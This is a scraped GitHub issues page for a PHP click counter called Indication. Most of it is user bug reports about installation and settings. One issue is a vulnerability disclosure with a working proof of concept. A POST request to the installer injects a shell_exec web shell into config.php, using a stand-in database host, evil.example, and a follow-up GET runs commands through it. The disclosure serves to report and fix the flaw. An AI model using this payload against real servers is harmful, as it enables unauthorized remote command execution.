joshf / indication Goto Github PK
View Code? Open in Web Editor NEWIndication is a PHP click counter which can also be used as a download counter
License: MIT License
Indication is a PHP click counter which can also be used as a download counter
License: MIT License
Write a new theme for SHTracker
Hi Josh,
A clean install of Indicator-newest.zip.
Installation: OK
Login: OK
Add link: OK
Count links: not OK
The created link is working, i.e. when clicking on teh downlaod,
the 'save as' vindow opens, select 'save ', downlaod is savedd.
However, the numer (prestet to a value of the previous used download couner) stays the same number.
If creating a new download link, it has characters such as "~" or "-" in the URL, it doesn't accept it as a valid input.
Hi Josh,
Yes, the bug is repeatable. I also tried to add a link, which also produced an error in the link id.
That one is just one time tested.
Ok, downloaded the mentioned branch, emptied the database and did a clean install.
Ah! Now the 'Path to script' is correctly entered by the installer.
Click: Install
Installer
Install Complete
Now login:OK
Go to 'Settings': NOT OK
At:
Count Unique Visitors Only
This settings allows you to make sure an individual user's clicks are only counted once
In the field Word after field
"Enabled" Enabled
"Disabled" Disabled";
} else { echo "
"Enabled" Enabled
"Disabled" Disabled"
; } ?>
Time
and
Theme
are OK
Could it be that in version 4 of PHP you used certain words that are reserved words in MySQL 5?
Hope this helps,
Thanks for the quick fix.
We'll get there!
Dirk
According to your readme.md, you released 4.3 before 4.2 and 4.2.1, so, I suppose it's ment to be 5/6 instead of 5/5?
The installer/install.php
script contains multiple vulnerabilities that can be exploited by a remote, unauthorized user to gain remote command execution on the server.
The containing vulnerabilities are:
The following proof of concept writes a shell into the config.php
:
POST /Indication/installer/install.php HTTP/1.0
doinstall&dbhost=evil.example&dbuser=dummy&dbpassword=dummy&dbname=dummy&adminuser=");echo+shell_exec($_REQUEST[0]."&adminpassword=1
This triggers the installer/install.php
script to initialize the Indication table on the MySQL server evil.example while writing the provided parameters into the config.php
file on the victim server, overwriting it if it already exists.
Due to an improper encoding of the user provided values during the generation of the PHP code for the config.php
, it is possible to inject PHP code into the config.php
file (see adminuser
parameter) which consequently allows the execution of arbitrary commands by the remote attacker:
GET /Indication/config.php?0=whoami HTTP/1.0
config.php
already exists.var_export
when exporting values to PHP code.Hello Josh,
I found your program a couple of days ago as a test on
an old server with PHP 4.3.10 with Mysql 4.0.23a.
Problemless installation, great program!, easy to use.
Then I did a clean instal (no database migration!) on
a server with PHP 5.2.9-2 and Mysql 5.1.58
Bug report:
Entered all the fields correctly, but
Installation:
Path to script: this field showed:
I replaced it with http://wyxs.net/links/
and click [Install]
Result: new screen:
Installer: install complete.
Go to login: ckick: OK
So far everything went well, then:
Click: Settings
Settings opens:
Admin details
Admin user:
Password:
At all other entry fields is visible:
Hope you can fix this.
Kind regards,
Our Open Source projects for schools:
If a new URL has upper case chars it automatically converts them to the lower case equivalent, leaving an incorrect URL.
Example:
Store all but database settings in a database table.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.